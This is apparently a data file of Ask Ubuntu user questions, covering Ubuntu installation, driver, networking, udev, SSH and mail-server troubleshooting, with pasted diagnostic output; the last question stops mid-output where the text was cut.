324458	installing 13.04 from usb causes a reboot hafway through	i recently installed 13.04 raring ringtail on a new , formatted usb flash drive , using the installer from http : //pendrivelinux.com . to boot from it , i rearranged the boot order in bios . the system messes around a bit , then shows `` try ubuntu '' and '' install ubuntu '' ( or words to that effect ) . running ubuntu from the usb - that is , clicking `` try ubuntu '' - works fine . the problem arises when i try to install . to simplify things , here 's a link : how to install ubuntu 13.04 raring ringtail these instructions are very clear , except on what to do when that does n't happen . everything is fine until part 3 . i want to install ubuntu alongside windows 7 , so i leave that box checked , and click `` continue '' . this always causes the computer to restart . i also discovered that if , instead of leaving the first box checked , i click on it ( and it stays ticked ) , the `` continue '' option turns into `` restart to continue '' . when the computer has restarted , everything s exactly as it was before . nothing is installed , windows runs fine , and going back to the ubuntu installer shows that nothing has changed there , either : it still restarts the computer . i have searched around on google ; the only links that look promising are on the ubuntuforum.org , which is currently offline , apparently due to a security breach . i think this is all of the relevant ( and irrelevant ! ) soft and hardware info : os name microsoft windows 7 home premium version 6.1.7601 service pack 1 build 7601 other os description not available os manufacturer microsoft corporation system name henrikoldcorn system manufacturer hewlett-packard system model hp pavilion dv6 notebook pc system type x64-based pc processor intel ( r ) core ( tm ) i5-2450m cpu @ 2.50ghz , 2501 mhz , 2 core ( s ) , 4 logical processor ( s ) bios version/date hewlett-packard f.1a , 22/06/2012 smbios version 2.7 windows directory c : \windows system directory c : \windows\system32 boot device \device\harddiskvolume1 locale united kingdom hardware abstraction layer version = `` 6.1.7601.17514 '' user name henrikoldcorn\henrik time zone gmt daylight time installed physical memory ( ram ) 8.00 gb total physical memory 7.95 gb available physical memory 4.09 gb total virtual memory 15.9 gb available virtual memory 11.2 gb page file space 7.95 gb page file c : \pagefile.sys the usb flash drive is a new sandisk 16 gb cruzer edge , that used to contain some rubbish from sandisk about encryption software , that was deleted when i formatted the drive with windows . so , what am i doing wrong , and how can i fix it ?
324459	can the positions for unity window snapping be modified to include more options ?	there is a pre-existing question similar to mine that you can find here : can snap-windows be set up for 4 windows instead of just 2 ? the questioner did n't ask the question with enough detail . in the current version of windows snap you can only select left or right half , top or bottom half , one of the corners , or maximize . i have a 1080p display on my laptop and would like to be able to add more options to snapping . i use some apps that take up much of the screen and other apps that require much less room . i 'd like to add the option to snap 3/4 to the left and 1/4 to the right . is this possible ?
324461	kolab groupware ( mail server ) fails to install because of dependency problems	i need some help . i 'm trying to setup a kolab sever to be used by computer science students at my college , starting this fall . i had a bit of some trouble setting up ldap , bur after some experimenting it finally worked . now i 'm having trouble installing kolab . in summary : sudo apt-get install kolab ( ... ) dpkg : error processing kolab-cli ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of kolab-server : kolab-server depends on pykolab ( = 0.5.11-5 ) ; however : package pykolab is not configured yet . ( ... ) dpkg : error processing kolab-saslauthd ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : pykolab kolab-cli kolab-server kolab-conf wallace kolab kolab-xml kolab-mta kolab-saslauthd how can i fix this ?
324464	what capture card recording software is available ?	i 'm trying to find good game capture software to use my climax digital vcap 303 with , the disc it came with did n't work ( arcsoft showbiz ) after downloading wine . i have downloaded tvtime television viewer but i ca n't seem to get it to work . the answers in this question did n't help .
324467	which driver should i install ?	does anybody know which driver i should install to update ubuntu from 12.04 to 12.10 i have a ati radeon xpress 200 graphics card . when ubuntu searches for drivers , it does n't find anything but without another driver i ca n't install 12.10 .
324468	ubuntu 12.04 usb keyboard stopped working	after an upgrade to 12.04 , my usb port stopped identifying my usb keyboard logitech k120 . i have switched keyboard and mouse to ensure that usb port is working . the mouse works perfect but keyboard does not work on another usb port either . i plugged the usb keyboard to another computer it works fine . somehow , after 12.04 upgrade , ubuntu stops recognizing usb keyboard on a laptop amilo fujitsu siemens . any advise please ? thanks .
324469	nautilus does n't remember sorting options	i have installed ubuntu 12.04 lts and am using the gnome desktop with no effects . i guess it is nautilus that i get when i click on places from the menu . my problem is that if i save a file in a folder and later try to open it by sorting modified , nautilus never remembers this state . thus , i have to sort the files all over again . i wish i had left 10.04 lts installed .
324470	isnt there any descriptive step by step guide for maas + juju + ceph + openstach ha deployment ?	i know this is the guide - https : //wiki.ubuntu.com/serverteam/openstackha , but its not just descriptive enough ? i saw in few question 's answers that above link is still yet to be updated , but when ? i really want to use juju for openstack deployment , but its lacking in documentation , that 's really annoying .
324473	can not install from flash drive	i am using a sony pen drive format fat32 to burn the image of ubuntu 13 using live usb creator . when i boot and choose the usb : hdd as the boot device - it brings a blank screen and a blinking cursor at the top . nothing happens from then on . i have determined the problem to be with the flash drive using still another syslinux.cfg . what do i do ?
324474	`` no screens found '' on acer aspire v5-122 ; live disk	trying to do a 13.04 live desk on acer aspire v5-122 , which has the touch screen . seems to be going ok at first , but then drops to command prompt with the x server reporting that no screens can be found . i saw someone else on here had the same problem .
324477	i need to setup ubuntu server on my vps	i need to set up ubuntu server on my vps but centos 6 x86 is already installed there . how could i replace centos with ubuntu ? i need to create 2 users . the ip addresses are 198.56.238.192 and 198.56.248.171 . how will could i set up them with putty ?
324484	unity - black windows when gaining focus	i 'm using ubuntu13.04+unity and , from time to time when i switch between windows , the one that gains focus goes bananas , and it 's rendered completely black . this happens randomly with any application ( skype , pidgin , etc . ) when its window is not maximized .
324486	about system requirements	my computer , a hp d260 mt brand machine has the following specs : pentium 4 processor @ 3.0 ghz on-board intel 82865g graphics controller 1 gb ram can you tell me please , which version of ubuntu will work fine on my pc , and what extra software will i need ? thank you !
324489	how to make an apt-get install command	am i able to make one of those `` apt-get install program '' codes that you use in terminal to download a program from my website ? if so , how ?
324493	vmware kills host 's network connection	i 'm using vwware 9 with windows 8 ( guest ) on ubuntu 13.04 ( host ) with network set to nat . it perfectly works when i 'm on wifi . but whenever i try using wired ethernet , it stops working . so , it looks like that : i have a connection , internet is accessible , everything 's fine , i start vm in vwmare player , windows sees connection , internet is accessible from within the guest for like 3-5 seconds , and then suddenly neither guest nor host can see internet anymore . and only thing i can do is to disable networking and re-enable it again and wait it to be killed again . i need to fix that asap , please help ps : both host and guest settings set to dhcp . firewall on guest machine is disabled . vmware tools are installed . switching to bridged connection ai n't helping
324498	wifi driver for hp pavillion	i have installed ubuntu 12.04 or on my hp pavillion . ubuntu works fine , but wifi driver is nor working^ attempt to switch wifi on causes almost immediate failure and led indicator is showing that wifi is off . this is not hardware problem , since for windows 7 ( i have alternative hdd with windows 7 ) wireless network works fine and i can surf through internet where can i get correct wifi driver and how to update my current driver ( or porbably update ubuntu to newer version ? ) ? thanks in advance
324500	udev rule for cdma modem is not working	the udev rule i 've written for cdma modem is subsystem== '' tty '' , attrs { binterfacenumber } == '' 00 '' , attrs { bnumendpoints } == '' 03 '' , attrs { product } == '' zte cdma tech '' , action== '' add '' , symlink+= '' cdmamodem '' and $ sudo udevadm info -a -p $ ( sudo udevadm info -q path -n /dev/ttyusb0 ) udevadm info starts with the device specified by the devpath and then walks up the chain of parent devices . it prints for every device found , all possible attributes in the udev rules key format . a rule to match , can be composed by the attributes of the device and the attributes from one single parent device . looking at device '/devices/ocp.2/47400000.usb/musb-hdrc.1.auto/usb1/1-1/1-1.4/1-1.4.3/1-1.4.3:1.0/ttyusb0/tty/ttyusb0 ' : kernel== '' ttyusb0 '' subsystem== '' tty '' driver== '' '' looking at parent device '/devices/ocp.2/47400000.usb/musb-hdrc.1.auto/usb1/1-1/1-1.4/1-1.4.3/1-1.4.3:1.0/ttyusb0 ' : kernels== '' ttyusb0 '' subsystems== '' usb-serial '' drivers== '' option1 '' attrs { port_number } == '' 0 '' looking at parent device '/devices/ocp.2/47400000.usb/musb-hdrc.1.auto/usb1/1-1/1-1.4/1-1.4.3/1-1.4.3:1.0 ' : kernels== '' 1-1.4.3:1.0 '' subsystems== '' usb '' drivers== '' option '' attrs { binterfaceclass } == '' ff '' attrs { binterfacesubclass } == '' ff '' attrs { binterfaceprotocol } == '' ff '' attrs { bnumendpoints } == '' 03 '' attrs { supports_autosuspend } == '' 1 '' attrs { balternatesetting } == '' 0 '' attrs { binterfacenumber } == '' 00 '' attrs { interface } == '' data interface '' looking at parent device '/devices/ocp.2/47400000.usb/musb-hdrc.1.auto/usb1/1-1/1-1.4/1-1.4.3 ' : kernels== '' 1-1.4.3 '' subsystems== '' usb '' drivers== '' usb '' attrs { bdevicesubclass } == '' 00 '' attrs { bdeviceprotocol } == '' 00 '' attrs { devpath } == '' 1.4.3 '' attrs { idvendor } == '' 19d2 '' attrs { speed } == '' 12 '' attrs { bnuminterfaces } == '' 6 '' attrs { bconfigurationvalue } == '' 1 '' attrs { bmaxpacketsize0 } == '' 64 '' attrs { busnum } == '' 1 '' attrs { devnum } == '' 6 '' attrs { configuration } == '' '' attrs { bmaxpower } == '' 500ma '' attrs { authorized } == '' 1 '' attrs { bmattributes } == '' a0 '' attrs { bnumconfigurations } == '' 1 '' attrs { maxchild } == '' 0 '' attrs { bcddevice } == '' 0000 '' attrs { avoid_reset_quirk } == '' 0 '' attrs { quirks } == '' 0x0 '' attrs { version } == '' 1.10 '' attrs { urbnum } == '' 3895 '' attrs { ltm_capable } == '' no '' attrs { manufacturer } == '' zte , incorporated '' attrs { removable } == '' unknown '' attrs { idproduct } == '' fff1 '' attrs { bdeviceclass } == '' 00 '' attrs { product } == '' zte cdma tech '' looking at parent device '/devices/ocp.2/47400000.usb/musb-hdrc.1.auto/usb1/1-1/1-1.4 ' : kernels== '' 1-1.4 '' subsystems== '' usb '' drivers== '' usb '' attrs { bdevicesubclass } == '' 00 '' attrs { bdeviceprotocol } == '' 01 '' attrs { devpath } == '' 1.4 '' attrs { idvendor } == '' 05e3 '' attrs { speed } == '' 480 '' attrs { bnuminterfaces } == '' 1 '' attrs { bconfigurationvalue } == '' 1 '' attrs { bmaxpacketsize0 } == '' 64 '' attrs { busnum } == '' 1 '' attrs { devnum } == '' 5 '' attrs { configuration } == '' '' attrs { bmaxpower } == '' 100ma '' attrs { authorized } == '' 1 '' attrs { bmattributes } == '' e0 '' attrs { bnumconfigurations } == '' 1 '' attrs { maxchild } == '' 4 '' attrs { bcddevice } == '' 7764 '' attrs { avoid_reset_quirk } == '' 0 '' attrs { quirks } == '' 0x0 '' attrs { version } == '' 2.00 '' attrs { urbnum } == '' 29 '' attrs { ltm_capable } == '' no '' attrs { removable } == '' unknown '' attrs { idproduct } == '' 0608 '' attrs { bdeviceclass } == '' 09 '' attrs { product } == '' usb2.0 hub '' looking at parent device '/devices/ocp.2/47400000.usb/musb-hdrc.1.auto/usb1/1-1 ' : kernels== '' 1-1 '' subsystems== '' usb '' drivers== '' usb '' attrs { bdevicesubclass } == '' 00 '' attrs { bdeviceprotocol } == '' 01 '' attrs { devpath } == '' 1 '' attrs { idvendor } == '' 05e3 '' attrs { speed } == '' 480 '' attrs { bnuminterfaces } == '' 1 '' attrs { bconfigurationvalue } == '' 1 '' attrs { bmaxpacketsize0 } == '' 64 '' attrs { busnum } == '' 1 '' attrs { devnum } == '' 2 '' attrs { configuration } == '' '' attrs { bmaxpower } == '' 100ma '' attrs { authorized } == '' 1 '' attrs { bmattributes } == '' e0 '' attrs { bnumconfigurations } == '' 1 '' attrs { maxchild } == '' 4 '' attrs { bcddevice } == '' 7764 '' attrs { avoid_reset_quirk } == '' 0 '' attrs { quirks } == '' 0x0 '' attrs { version } == '' 2.00 '' attrs { urbnum } == '' 49 '' attrs { ltm_capable } == '' no '' attrs { removable } == '' unknown '' attrs { idproduct } == '' 0608 '' attrs { bdeviceclass } == '' 09 '' attrs { product } == '' usb2.0 hub '' looking at parent device '/devices/ocp.2/47400000.usb/musb-hdrc.1.auto/usb1 ' : kernels== '' usb1 '' subsystems== '' usb '' drivers== '' usb '' attrs { bdevicesubclass } == '' 00 '' attrs { bdeviceprotocol } == '' 01 '' attrs { devpath } == '' 0 '' attrs { idvendor } == '' 1d6b '' attrs { speed } == '' 480 '' attrs { bnuminterfaces } == '' 1 '' attrs { bconfigurationvalue } == '' 1 '' attrs { bmaxpacketsize0 } == '' 64 '' attrs { authorized_default } == '' 1 '' attrs { busnum } == '' 1 '' attrs { devnum } == '' 1 '' attrs { configuration } == '' '' attrs { bmaxpower } == '' 0ma '' attrs { authorized } == '' 1 '' attrs { bmattributes } == '' e0 '' attrs { bnumconfigurations } == '' 1 '' attrs { maxchild } == '' 1 '' attrs { bcddevice } == '' 0308 '' attrs { avoid_reset_quirk } == '' 0 '' attrs { quirks } == '' 0x0 '' attrs { serial } == '' musb-hdrc.1.auto '' attrs { version } == '' 2.00 '' attrs { urbnum } == '' 28 '' attrs { ltm_capable } == '' no '' attrs { manufacturer } == '' linux 3.8.13-bone21 musb-hcd '' attrs { removable } == '' unknown '' attrs { idproduct } == '' 0002 '' attrs { bdeviceclass } == '' 09 '' attrs { product } == '' musb hdrc host driver '' looking at parent device '/devices/ocp.2/47400000.usb/musb-hdrc.1.auto ' : kernels== '' musb-hdrc.1.auto '' subsystems== '' platform '' drivers== '' musb-hdrc '' attrs { mode } == '' b_peripheral '' attrs { vbus } == '' vbus off , timeout 1100 msec '' looking at parent device '/devices/ocp.2/47400000.usb ' : kernels== '' 47400000.usb '' subsystems== '' platform '' drivers== '' musb-dsps '' looking at parent device '/devices/ocp.2 ' : kernels== '' ocp.2 '' subsystems== '' platform '' drivers== '' '' where did i go wrong ? i don get /dev/cdmamodem when i plug in the modem .
324501	do i still need bumblebee ?	i saw that nvidia has released an official driver for optimus in june 25 ( link ) . is optimus fully supported for linux , or do we still need bumblebee ? has anyone compared the performance between bumblebee and nvidia official driver ?
324502	hp pavillion amd radeon 4250 problem	i have the amd mobility radeon hd 4250 graphics card and i am running ubuntu 12.04 now it will install my graphics card either via the command line or by going to the amd website and downloading it i am running the 64bit ubuntu but when i install the graphics driver it installs but then says there was a problem and when i go to open my catalyst control center it says that the graphics driver was not installed properly and i did download the 64bit driver because that is what my computer is a 64 bit ... and the problem also persists as in i can not get my compiz to work and also it doesnt show any of the effects i had before compiz such as the simple opening and closing ... .and i had to reinstall ubuntu on my computer after uninstalling the graphics card ... .i have looked and can not seem to find anything ... i know amd pulled the plug on the 4,000 series radeon hd in the 13.04 ubuntu and up ... .can someone who knows more about this than i do because am a linux noob and proud of it i only recently started using linux full time on my laptop ... .but can someone please help me fix this problem to where it all will work better than it does when i try ... any help would greatly be apprecieated
324503	2 sshd configurations 1 for internal and 1 external	how can i setup open ssh server so that if i 'm ssh'ng from a local lan i want it to be via port 22 but if i 'm coming externally its via port 12345 for example . then for external access i 'd like some different ( stricter ) rules in sshd_config
324504	will ubuntu fix my video card driver issue ?	will ubuntu work on a dell inspirion 1300 netbook currently running windows xp ? i 've tried install windows 7 ultimate and it 's not working properly due to the video card driver issue . the celeron processor is so old that even a custom driver for it does n't do the job . ca n't see even a simple youtube video . will ubuntu work on my system , and fix the problem with the video card ? or i should try it first and let you know . thanks in advance .
324509	how to run mac os x virtually on ubuntu 12.04	i am using ubuntu 12.04 stable version and oracle virtual box 4.1.2_ubuntu have a iso file of snow leopard with me , when i run virtual box i got following error : fatal ! could not read from the boot medium ! system halted . i have selected setting , storage , ide controller > snow leopard . i have also run iso file in vmware player , it shows me following message . operating system not found . still giving me an error , did iso image should be bootable or it is always ? can anybody tell from where i can download latest version of mac os x with xcode . xcode is important for me . also any other good option to run mac os virtually on ubuntu . if anyone have links for that please share .
324515	hotspot and internet access together -- why not ?	if i go settings â network â wireless and select use as hotspot ... , i get the following message : if you have a connection to the internet other than wireless , you can use it to share your internet connection with others . switching on the wireless hotspot will disconnect you from abc . it is not possible to access the internet through your wireless while the hotspot is active . what are the technical reasons why i ca n't set up an hotspot and be connected to the internet at the same time ?
324522	ubuntu 13.04 + gnome 3.8 input switch keyboard shortcut	i 'm trying to setup a keyboard shortcut to change the input language on my ubuntu 13.04 running gnome 3.8 . i do n't really care which service handles this , as long as i can alt+shift to change inputs , and have an indication of which language is currently used in the taskbar . i 'd love for some guidance from someone who got it working . thanks
324523	dual screen configuration ( twin screens ) flickering on catalyst ubuntu 13.04	i installed catalyst using this guide how do i get amd/intel hybrid graphics drivers to work ? and got flickering screen after choosing extended mode . before changing location of displays using xranrd or display settings everything is ok ( i just get one display ) , but after moving any of screens i get just flickering picture - can not do anything and have to wait for 30 secs until the previous configuration is restored . the latest beta and latest stable catalyst drivers have been tried . what is the source of problems ? thanks !
324534	how to install software in ubuntu 13.04 gnome without an internet connection ?	i am new to linux i am currently using ubuntu 13.04 . how do i install tar.gz software files , without the use of ubuntu software center or internet connectivity .
324536	load issue with no i/o or cpu usage	i have a high traffic web server ( 1500 to 2000 users on average at any given second ) which has been running for months with no issues . this morning at 4 a.m. the load jumped from a 6.4 to 391 - 450 . there is virtually jno cpu usage reporting from top or htop , iotop reveals 0.00 / 300 kbs ( r/w ) access intermittently . i just turned off eth0 ( the only nic that 's up besides lo ) and the load goes up . i also shut off apache2 and the load still does not decrease . with apache off i still see multiple pid 's with user www-data that i can not kill . if i reboot the load goes back up to 300 's in about 20 seconds . any ideas ?
324538	installations on seperate disks	i 'm having trouble installing ubuntu 13.04 on my windows 8 machine . the slot one disk is a 360gb ssd with w8 , but the disk i want to install ubuntu on is a 120gb ssd . i keep trying to install the os , but it tells me there 's no root system on the 120gb ssd that i want to use . i was wondering if anyone could help because i can not find what i think is a relevant article .
324539	resolution problem after upgrading kernel	i have an asus laptop x53s and ubuntu 12.04 . after the last update to 3.2.0-50-generic , my resolution changed to 1024x768 and it is not possible to increase it as before . in system > settings , i see : vesa : intel sandybridge mobile graphics how to load the native driver i used before the upgrade ?
324541	text is too small in counter-strike : source ( steam )	the text in cs : s is far too small , it looks like its using the wrong font or something . is there a way to fix this ?
324542	/var directory and redis	in terms of the filesystem hierarchy standard , the /var directory contains variable files â files whose content is expected to continually change during normal operation of the systemâ such as logs , spool files , and temporary e-mail files . now if you read the redis documentation : http : //redis.io/topics/quickstart there is this line : create a directory where to store your redis config files and your data : sudo mkdir /etc/redis sudo mkdir /var/redis now the config files obviously go in /etc . but it says `` store your data in /var '' . what does it mean by that ? the way redis works is that the data is stored in ram , not on the disk . so what data is it referring to ?
324543	is there a way to get some notification if my ubuntu 12.04 uses 90 % of cpu	now a days , my computer is getting stuck as i m running lot of programs.what i need is a some kind of notification when processes become 90 % or so .
324544	how do i solve `` server requires packet signing to be enabled '' when mounting a windows share ?	11:12 dev @ ubuntu ~/qsr ( build-0.3 ) $ dmesg [ 57392.897482 ] cifs vfs : server requires packet signing to be enabled in /proc/fs/cifs/securityflags . [ 57392.897935 ] cifs vfs : cifs_mount failed w/return code = -95 my fstab entry : //192.168.101.5/development/repositories /mnt/servername/development/repositories cifs credentials=/home/dev/.smbcredentials , uid=dev , gid=dev , iocharset=utf8 , sec=ntlm 0 0 i 've got another entry in fstab that is nearly identical and is also mounting a windows share -- but it 's not resulting in an error . another question : where would i find docs for that return code ? this error has only popped up since i went from 32b 12.04 to 64b 12.04 . the fstab entry was fine in 32b . edit : removing sec=ntlm seems to have fixed it . no idea why . anyone have an answer for that ? i 'm going to leave this question up in case anyone else runs into this issue .
324545	maas node os auto install - failed to retrieve preseed configuration file	maas server is up and running with 4 nodes . nodes have commissioned and are in ready state i 'm running into an issue while automating os install using standard default preseed file . node starts fine from maas webconsole but it could n't retrieve the preseed file from mass server using standard url ( http : //192.168.x.x/maas/metadata/latest/by-id/node-/ ? op=get_preseed ) . since the node could n't download the preseed file , the installation falls back to non automated mode . clocks are in sync and the url works fine from maas server web browser .
324549	can i run ubuntu 12.10 or 13.04 on an ati xpress 200 graphics card ?	i have a acer aspire t650 pc with a pentium 4 processor and a ati xpress 200 grafics card . does anybody knows if i can update ubuntu from 12.04 to 12.10 and to 13.04 and if so which driver do i need to install ? i am unsure because there is already no support for radeon 2xxx and 4xxx cards
324557	which version to install on macbook pro	i 'm new to ubuntu , i really want to check it out but i 'm having a bit of trouble , hopefully y'all can help me out . i have a macbook pro mid-2010 version . i downloaded ubuntu 13.04 64-bit version , and then burned it
324560	is there a way to get flash 11 on ubuntu 13.04 ?	i am trying to play my games but not being able to play all of them because of no flash 11 . is there anyway to fix this ?
324561	shutter selection window	when i open shutter and click on selection the screen is taken up by the various shortcut keys that can be used with it . that information screen at times blocks what i wish to select . how do i get rid of it or move it out of the way ? bare with me if this seems like a dumb question i am a real `` newbie '' .
324565	files and folders became read only , can not back up data	i need one urgent help . i am using ubuntu 12.10 . my hard drive is only one year old . suddenly all of my folders and files became read only . after checking in google , i came to know that this is something related to corrupt file system . i can not transfer the files and folders to another machine or to an external hard drive . i need to back up my files immediately because otherwise i will loose many of my work . thanks in advance . edit : following this thread , i have performed dmesg | less why has my file-system turned read-only after updates ? now i am not sure what particular error to look for , but i can see following [ 1.844462 ] drm : registered panic notifier [ 1.844474 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 3.082945 ] ext4-fs ( sda1 ) : info : recovery required on readonly filesystem [ 3.082951 ] ext4-fs ( sda1 ) : write access will be enabled during recovery [ 6.511793 ] ext4-fs ( sda1 ) : orphan cleanup on readonly fs [ 6.511810 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 9962260 [ 6.511925 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 9966039 [ 6.511972 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 9966038 [ 6.511991 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 9966043 [ 6.553657 ] ext4-fs ( sda1 ) : 10 orphan inodes deleted [ 6.553663 ] ext4-fs ( sda1 ) : recovery complete [ 17.401897 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro , user_xattr [ 18.142384 ] init : failsafe main process ( 789 ) killed by term signal edit2 : following is the output when i ran fsck from recovery mode : fsck from util-linux 2.20.1 dev/sda1 : 848236/30400512 files ( 0.5 % non contiguous ) , 35852000/121574400 blocks finished , please press enter solved
324574	can not ssh into new vagrant install of 13.04	i used the vagrant image for 13.04 from http : //cloud-images.ubuntu.com/vagrant/raring/current/raring-server-cloudimg-i386-vagrant-disk1.box to create a new virtual machine and tried to connect to it using ssh . however , the ssh always disconnected immediately , without even getting to the stage where it tried to authenticate . i opened the vm in the virtualbox gui and looked at the ssh log file ( auth.log ) . it was full of lines like this : jul 25 17:57:02 vagrant-ubuntu-raring-32 sshd [ 898 ] : error : could not load host key : /etc/ssh/ssh_host_rsa_key jul 25 17:57:02 vagrant-ubuntu-raring-32 sshd [ 898 ] : error : could not load host key : /etc/ssh/ssh_host_dsa_key jul 25 17:57:02 vagrant-ubuntu-raring-32 sshd [ 898 ] : error : could not load host key : /etc/ssh/ssh_host_ecdsa_key jul 25 17:57:02 vagrant-ubuntu-raring-32 sshd [ 898 ] : fatal : no supported key exchange algorithms [ preauth ] the problem was solved by executing the following commands : sudo ssh-keygen -f /etc/ssh/ssh_host_ecdsa_key -n '' -t ecdsa sudo ssh-keygen -f /etc/ssh/ssh_host_dsa_key -n '' -t dsa sudo ssh-keygen -f /etc/ssh/ssh_host_rsa_key -n '' -t rsa i would assume that these should run automatically at some point , especially given that ( a ) i did not have to run them myself when i installed ubuntu from an iso image , and ( b ) because vagrant is supposed to be designed that after you run vagrant up you can immediately use the vm without any additional configuration . i may need to create a large number of virtual machines in the near future and i was hoping that i could use vagrant to do it , but i ca n't do it if i 'm going to have to manually fix ssh on each one . does anyone know why this happens and what can be done to fix it ? should i report it as a bug ?
324576	/etc/apt/preferences file is missing	i should pinning and set priority to ubuntu repository for installing kolab mail server . i just added the following to sources.list , deb http : //mirror.kolabsys.com/pub/ubuntu/kolab-3.0/ precise release updates deb-src http : //mirror.kolabsys.com/pub/ubuntu/kolab-3.0/ precise release updates but for adding package : * pin : origin mirror.kolabsys.com pin-priority : 501 i can not find any `` preferences '' file in /etc/apt/ . i searched in google a lot , but i did n't find anythings . even in the `` preferences.d '' directory there is not any `` preferences '' file . i should mention that i am using ubuntu 12.04 . how can i make the /etc/apt/preferences file ?
324578	install ubuntu inside/alongside windows 7	i 'm confused about ubuntu , last time i installed it , i lost all my data on hard drive ( as i have no experience of ubuntu ) . but still i love this operating system as i want some change , the thing i want to know , how can i install ubuntu so that my all data , partitions and windows 7 wont get effected ? i have ubuntu 13.04 desktop iso file . i have made a bootable usb also . i want to install it inside/alongside windows 7 , so that i keep learning how to use it and then , maybe migrate to it completely , can you help me on this ? ?
324583	how do i change the brightness in compiz ?	after i set the option `` cube reflection and deformation '' in compiz , when i try reduce the `` opacity while not running '' the screen stay darker . i wanted to post a picture but i am unable to do so due to insufficient reputation . i think this problem is easy to solve , once i got it ... but i do n't remeber .
324584	how can i get the android ubuntu one music app to eagerly cache everything locally ?	i 've set the `` cache size '' to 10gb ( which is enough to hold all my music ) and `` songs to preload '' to `` unlimited '' but the phone only seems to cache files locally when i play them or they appear in the queue . what i 'd love is to button that says `` fill up the cache '' that downloads everything that fits ( which in my case would be everything ) . anyone know to achieve something like this ?
324597	wireless manager on a rampage - ranlink driver rt3290 active & in use but not working	i 've just replaced windows 8 on a hp envy notebook with ubuntu 12.04 and whereas before , the wireless led on f12 would be blue to connect with wireless networks , it 's now permanently red ( not working ) and in the networks tab under system settings , there is no reference to any sort of ability to connect to a wireless network - as well as wlan0 not existing when i type 'iwconfig ' into the command line . stefanija @ stefanija-hp-envy-sleekbook-6-pc : ~ $ iwconfig lo no wireless extensions . eth1 no wireless extensions . ra0 ralink sta link quality:0 signal level:0 noise level:0 rx invalid nwid:0 invalid crypt:0 invalid misc:0 eth0 no wireless extensions and stefanija @ stefanija-hp-envy-sleekbook-6-pc : ~ $ ifconfig wlan0 up wlan0 : error while getting interface flags : no such device i 've researched similar issues and followed advice from this tutorial in order to make a suitable driver for rt3290 . ( as that 's appropriate for my wireless card ) i then rebooted and checked in the additional drivers to see if it had worked ( as the computer still was n't showing any wireless networks ) and the driver was there , was active and in use , but still was n't picking up any connections . i also tried this tutorial , however , i could n't get past opening the file with the archive manager because the system hit an internal error and refused to extract it as an .exe . i 'd be extremely grateful if someone could tell me what happened or how i can fix this , and apologies if i have n't been very specific or posted this in the wrong place , or asked something stupid ; i 'm quite new to ubuntu and the forums , heh , so if i 've missed parts out or anything , please let me know .
324604	can we have multiple juju config files ?	as per documentation i have created 1st config file enviroments.yaml by juju generate-config -w command . do i need to create separate '' .yaml '' file for ceph or openstack services ? or i can just add new environment to existing config file ?
324606	ca n't click and drag on sentelic fingersensingpad on vizio ultrabook	i have a sentelic fingersensingpad on a vizio ct15 ultrabook . i am using kernel 3.9 . i am unable to click and drag ( i.e . click with one finger , and move window around with the other . ) setting the synaptic clickpad=1 does not help . adjusting the areabottomedge does make a portion of the bottom of the clickpad unusable , but still i can not click and drag . it registers the click , but not the drag . i paste below the output of xinput and synclient : - > xinput list-props `` fspps/2 sentelic fingersensingpad '' device 'fspps/2 sentelic fingersensingpad ' : device enabled ( 134 ) : 1 coordinate transformation matrix ( 136 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 262 ) : 1 device accel constant deceleration ( 263 ) : 2.500000 device accel adaptive deceleration ( 264 ) : 1.000000 device accel velocity scaling ( 265 ) : 12.500000 synaptics edges ( 286 ) : 38 , 929 , 38 , 673 synaptics finger ( 287 ) : 25 , 30 , 256 synaptics tap time ( 288 ) : 180 synaptics tap move ( 289 ) : 52 synaptics tap durations ( 290 ) : 180 , 180 , 100 synaptics clickpad ( 291 ) : 1 synaptics tap fasttap ( 292 ) : 0 synaptics middle button timeout ( 293 ) : 75 synaptics two-finger pressure ( 294 ) : 282 synaptics two-finger width ( 295 ) : 7 synaptics scrolling distance ( 296 ) : 24 , 24 synaptics edge scrolling ( 297 ) : 0 , 0 , 0 synaptics two-finger scrolling ( 298 ) : 1 , 1 synaptics move speed ( 299 ) : 1.000000 , 1.750000 , 0.166667 , 40.000000 synaptics edge motion pressure ( 300 ) : 30 , 160 synaptics edge motion speed ( 301 ) : 1 , 96 synaptics edge motion always ( 302 ) : 0 synaptics off ( 303 ) : 2 synaptics locked drags ( 304 ) : 0 synaptics locked drags timeout ( 305 ) : 5000 synaptics tap action ( 306 ) : 0 , 0 , 0 , 0 , 0 , 0 , 0 synaptics click action ( 307 ) : 1 , 1 , 0 synaptics circular scrolling ( 308 ) : 0 synaptics circular scrolling distance ( 309 ) : 0.100000 synaptics circular scrolling trigger ( 310 ) : 0 synaptics circular pad ( 311 ) : 0 synaptics palm detection ( 312 ) : 0 synaptics palm dimensions ( 313 ) : 10 , 200 synaptics coasting speed ( 314 ) : 20.000000 , 50.000000 synaptics pressure motion ( 315 ) : ... of unknown type cardinal synaptics pressure motion factor ( 316 ) : 1.000000 , 1.000000 synaptics resolution detect ( 317 ) : 1 synaptics grab event device ( 318 ) : 1 synaptics gestures ( 319 ) : 1 synaptics capabilities ( 320 ) : 1 , 0 , 1 , 1 , 0 , 0 , 0 synaptics pad resolution ( 321 ) : 1 , 1 synaptics area ( 322 ) : 0 , 0 , 0 , 0 synaptics noise cancellation ( 323 ) : 6 , 6 device product id ( 251 ) : 2 , 15 device node ( 252 ) : `` /dev/input/event12 '' synaptics soft button areas ( 581 ) : 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 - > synclient parameter settings : leftedge = 38 rightedge = 929 topedge = 38 bottomedge = 673 fingerlow = 25 fingerhigh = 30 fingerpress = 256 maxtaptime = 180 maxtapmove = 52 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 fasttaps = 0 emulatemidbuttontime = 75 emulatetwofingerminz = 282 emulatetwofingerminw = 7 vertscrolldelta = 24 horizscrolldelta = 24 vertedgescroll = 0 horizedgescroll = 0 